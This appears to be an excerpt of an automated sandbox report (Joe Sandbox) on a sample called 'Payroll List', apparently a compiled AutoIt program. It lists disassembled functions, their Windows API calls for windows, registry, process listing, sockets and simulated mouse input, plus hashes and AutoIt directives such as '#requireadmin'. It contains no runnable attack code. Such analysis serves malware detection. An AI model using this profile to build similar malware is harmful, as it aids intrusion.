                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 2178440468-0
                                                                    • Opcode ID: 25fe19e94e243f3bb6944ca1ad235fcdeb64ec5a057e08a2d3c5af201e217088
                                                                    • Instruction ID: 77e4e6054b4ffd61e621e1d6ced48e6436ea92fbd529a0b03e9f5ac754a06a45
                                                                    • Opcode Fuzzy Hash: 25fe19e94e243f3bb6944ca1ad235fcdeb64ec5a057e08a2d3c5af201e217088
                                                                    • Instruction Fuzzy Hash: 85312A74600215EFDB219F98DC84F6537A9FB4A714F1901A4F5198F6B1CBB1A980DF41
                                                                    Function 001608AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001608F2
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00160918
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 0016091B
                                                                    • SysAllocString.OLEAUT32(?), ref: 00160939
                                                                    • SysFreeString.OLEAUT32(?), ref: 00160942
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00160967
                                                                    • SysAllocString.OLEAUT32(?), ref: 00160975
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: d03d3ef2015ad3b3511974e8c6c0401b9b3b32209c330a508b317bb1a60b5472
                                                                    • Instruction ID: f0567c867f27617e55b3714f5b79c3ae3901fec4e52c2c3c199b74ebb8758cf0
                                                                    • Opcode Fuzzy Hash: d03d3ef2015ad3b3511974e8c6c0401b9b3b32209c330a508b317bb1a60b5472
                                                                    • Instruction Fuzzy Hash: 0F21C172601208AFEB109FB8DC88DBB73ACEB0D364B008125F909DB691D770EC41CBA0
                                                                    Function 00162472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 1038674560-2734436370
                                                                    • Opcode ID: 6945ac1c362daa7ae8b09ff108fd8d1e14f891afc5ad7885d5babd64b98efde9
                                                                    • Instruction ID: 4aa7a75b16f4d90d25dec81c2c988fb7a0c465f7e5712ca923a75cec683bc0ea
                                                                    • Opcode Fuzzy Hash: 6945ac1c362daa7ae8b09ff108fd8d1e14f891afc5ad7885d5babd64b98efde9
                                                                    • Instruction Fuzzy Hash: CE216B72644A12B7C334AA349C16FFB7398EFB5340F60402AF44797181EB7599A2C3D5
                                                                    Function 00160986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001609CB
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001609F1
                                                                    • SysAllocString.OLEAUT32(00000000), ref: 001609F4
                                                                    • SysAllocString.OLEAUT32 ref: 00160A15
                                                                    • SysFreeString.OLEAUT32 ref: 00160A1E
                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00160A38
                                                                    • SysAllocString.OLEAUT32(?), ref: 00160A46
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                    • String ID:
                                                                    • API String ID: 3761583154-0
                                                                    • Opcode ID: d31fe487fdc860b2b1cbe09c6bb86d501a22c64482bfa534a2df5e4f0ba14f9f
                                                                    • Instruction ID: 331dd5d16541bb269c70a6b05c8de9e74254a14b4081acdac4da391f04cce78e
                                                                    • Opcode Fuzzy Hash: d31fe487fdc860b2b1cbe09c6bb86d501a22c64482bfa534a2df5e4f0ba14f9f
                                                                    • Instruction Fuzzy Hash: F0215E75605204AFDB11DBA8DC88DAB77ACEB0D3607018125F909CB6A1EB74EC818B64
                                                                    Function 0018A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                      • Part of subcall function 0013D17C: GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                      • Part of subcall function 0013D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0018A32D
                                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0018A33A
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0018A345
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0018A354
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0018A360
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 1025951953-3636473452
                                                                    • Opcode ID: b1d7fb4a1b1912b46f7b2f602a6829b889366639433a3ea827ab78ee0b2434db
                                                                    • Instruction ID: 912535c010c457be3a65f127acfa1985c9ead5f90dcc2101d6b90cac0eb1dcc6
                                                                    • Opcode Fuzzy Hash: b1d7fb4a1b1912b46f7b2f602a6829b889366639433a3ea827ab78ee0b2434db
                                                                    • Instruction Fuzzy Hash: 5F1160B1150219BFEF155FA4DC85EEB7F6DFF09798F014115BA08A60A0C7729C21DBA4
                                                                    Function 0013CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?), ref: 0013CCF6
                                                                    • GetWindowRect.USER32(?,?), ref: 0013CD37
                                                                    • ScreenToClient.USER32(?,?), ref: 0013CD5F
                                                                    • GetClientRect.USER32(?,?), ref: 0013CE8C
                                                                    • GetWindowRect.USER32(?,?), ref: 0013CEA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Rect$Client$Window$Screen
                                                                    • String ID:
                                                                    • API String ID: 1296646539-0
                                                                    • Opcode ID: 6a25b6cb7e1adb99458c4efbcc55272cff68eb8633c5407484848fa6714437c9
                                                                    • Instruction ID: 91f63ce2680ef32c2226bb7e106b4859911fe418ea4a10f40a857ee535587733
                                                                    • Opcode Fuzzy Hash: 6a25b6cb7e1adb99458c4efbcc55272cff68eb8633c5407484848fa6714437c9
                                                                    • Instruction Fuzzy Hash: 11B15A79A00649DBDF14CFA8C4807EEBBB1FF08310F199529EC59EB254DB30A950DBA4
                                                                    Function 00181BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00181C18
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00181C26
                                                                    • __wsplitpath.LIBCMT ref: 00181C54
                                                                      • Part of subcall function 00141DFC: __wsplitpath_helper.LIBCMT ref: 00141E3C
                                                                    • _wcscat.LIBCMT ref: 00181C69
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00181CDF
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00181CF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 1380811348-0
                                                                    • Opcode ID: eccf89d8c704f0b90d8feaf04064309913d256716450049a86dcfa73b1393444
                                                                    • Instruction ID: 1c6b921c37aff4a056636da9b80abda3e8f6d818fe287b6c47c0822619fae0cb
                                                                    • Opcode Fuzzy Hash: eccf89d8c704f0b90d8feaf04064309913d256716450049a86dcfa73b1393444
                                                                    • Instruction Fuzzy Hash: C5518FB2104300AFD720EF64D885EABB7ECEF98754F00491EF58A97251DB30DA05CB92
                                                                    Function 00182FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00183C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182BB5,?,?), ref: 00183C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001830AF
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001830EF
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00183112
                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0018313B
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0018317E
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0018318B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                    • String ID:
                                                                    • API String ID: 3451389628-0
                                                                    • Opcode ID: 18d60e4204d28e52fbfdcd6b12dd103f2442f0da2e6baa6e260fcc7f67a7dc3c
                                                                    • Instruction ID: d82b321e8bc23c826f85456f48af255b000ba015d3629c8efff4c9530fde746b
                                                                    • Opcode Fuzzy Hash: 18d60e4204d28e52fbfdcd6b12dd103f2442f0da2e6baa6e260fcc7f67a7dc3c
                                                                    • Instruction Fuzzy Hash: 98515831108300AFC704EF64D885E6EBBE9FF99704F08491DF695872A1DB71EA15CB92
                                                                    Function 001884DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenu.USER32(?), ref: 00188540
                                                                    • GetMenuItemCount.USER32(00000000), ref: 00188577
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0018859F
                                                                    • GetMenuItemID.USER32(?,?), ref: 0018860E
                                                                    • GetSubMenu.USER32(?,?), ref: 0018861C
                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0018866D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                    • String ID:
                                                                    • API String ID: 650687236-0
                                                                    • Opcode ID: a60331ce6575ca47a65a00cd9845ccd301bf4483ed1990b0248b8e3b2122586b
                                                                    • Instruction ID: dc71eddd2e8e6c70fcbd6cdbc2d893761fe6385f691387407796a7687be726c2
                                                                    • Opcode Fuzzy Hash: a60331ce6575ca47a65a00cd9845ccd301bf4483ed1990b0248b8e3b2122586b
                                                                    • Instruction Fuzzy Hash: 4F519C71E00624AFCF15EFA8D881AAEB7F5EF58310F114499E916BB351DB30AE418F90
                                                                    Function 00164AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00164B10
                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00164B5B
                                                                    • IsMenu.USER32(00000000), ref: 00164B7B
                                                                    • CreatePopupMenu.USER32 ref: 00164BAF
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00164C0D
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00164C3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: c3949633c41e881e63ab0ac37529ac71427121be608a4e104a6bb762ab4ee185
                                                                    • Instruction ID: a380ba80b6b11317e35f80257eba8dfe1923876f435d14e9a5823296842f9ea6
                                                                    • Opcode Fuzzy Hash: c3949633c41e881e63ab0ac37529ac71427121be608a4e104a6bb762ab4ee185
                                                                    • Instruction Fuzzy Hash: E151F070A01309EFCF25CF68DC88BAEBBF4AF55318F148159E4159B290E3719A64CB51
                                                                    Function 00178DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,001BDC00), ref: 00178E7C
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178E89
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00178EAD
                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00178EC5
                                                                    • _strlen.LIBCMT ref: 00178EF7
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00178F6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_strlenselect
                                                                    • String ID:
                                                                    • API String ID: 2217125717-0
                                                                    • Opcode ID: 94112dfba2e7c5d07bf2fe5a938fe156ae742a85da4054a6aebd15fb1205ecdb
                                                                    • Instruction ID: e766ecc87723a27652b48afbc4a5d5e19f9f024e144085bc529eee27bb6512f2
                                                                    • Opcode Fuzzy Hash: 94112dfba2e7c5d07bf2fe5a938fe156ae742a85da4054a6aebd15fb1205ecdb
                                                                    • Instruction Fuzzy Hash: 8541A471500104AFCB18EBA4DD9AEAEB7B9AF68314F108559F51A976D1DF30AE40CB60
                                                                    Function 0013ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • BeginPaint.USER32(?,?,?), ref: 0013AC2A
                                                                    • GetWindowRect.USER32(?,?), ref: 0013AC8E
                                                                    • ScreenToClient.USER32(?,?), ref: 0013ACAB
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0013ACBC
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0013AD06
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0019E673
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 2592858361-0
                                                                    • Opcode ID: 03d399c232c3778cd7236fd1dbd92d81599d746c2adb111f393a78dfaa960032
                                                                    • Instruction ID: 556a337bbe432c43f6218bc8e9c0879232cc897fef9dbaea12e67c420d9aed5a
                                                                    • Opcode Fuzzy Hash: 03d399c232c3778cd7236fd1dbd92d81599d746c2adb111f393a78dfaa960032
                                                                    • Instruction Fuzzy Hash: 4241D270104300AFCB10DF64DC84FBA7BE8FF59720F040669F9A58B6A1D771A985DB62
                                                                    Function 0018E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ShowWindow.USER32(001E1628,00000000,001E1628,00000000,00000000,001E1628,?,0019DC5D,00000000,?,00000000,00000000,00000000,?,0019DAD1,00000004), ref: 0018E40B
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0018E42F
                                                                    • ShowWindow.USER32(001E1628,00000000), ref: 0018E48F
                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0018E4A1
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0018E4C5
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0018E4E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 3d94b0b6c246a94d65b1897bc209550353ace69a80532ffb32fae5cf8c9df9d1
                                                                    • Instruction ID: 0f295b817917d5e3f6548762958663dbbfb96ae7df35ec569793f741da6f9e62
                                                                    • Opcode Fuzzy Hash: 3d94b0b6c246a94d65b1897bc209550353ace69a80532ffb32fae5cf8c9df9d1
                                                                    • Instruction Fuzzy Hash: 0D418C34601540EFDB26DF28C489F947BE0BF0A304F1881A9EA5DCF6A2C731AA46CF51
                                                                    Function 001698BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 001698D1
                                                                      • Part of subcall function 0013F4EA: std::exception::exception.LIBCMT ref: 0013F51E
                                                                      • Part of subcall function 0013F4EA: __CxxThrowException@8.LIBCMT ref: 0013F533
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00169908
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00169924
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0016999E
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001699B3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 001699D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 2537439066-0
                                                                    • Opcode ID: af2aefa4ee8bfb31890311ad671b0d670adaa40e100f9fbb0ce1206f9c8b4d0a
                                                                    • Instruction ID: 3da8e98873b76950c6190e6639f856e65ccff7b4b83a8ce659e6b514ba24d247
                                                                    • Opcode Fuzzy Hash: af2aefa4ee8bfb31890311ad671b0d670adaa40e100f9fbb0ce1206f9c8b4d0a
                                                                    • Instruction Fuzzy Hash: 72316F71900205EBDB10EFA4DC85EAEBBB8FF95710F1480A9F905AB246D774DA51CBA0
                                                                    Function 00179B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,001777F4,?,?,00000000,00000001), ref: 00179B53
                                                                      • Part of subcall function 00176544: GetWindowRect.USER32(?,?), ref: 00176557
                                                                    • GetDesktopWindow.USER32 ref: 00179B7D
                                                                    • GetWindowRect.USER32(00000000), ref: 00179B84
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00179BB6
                                                                      • Part of subcall function 00167A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    • GetCursorPos.USER32(?), ref: 00179BE2
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00179C44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
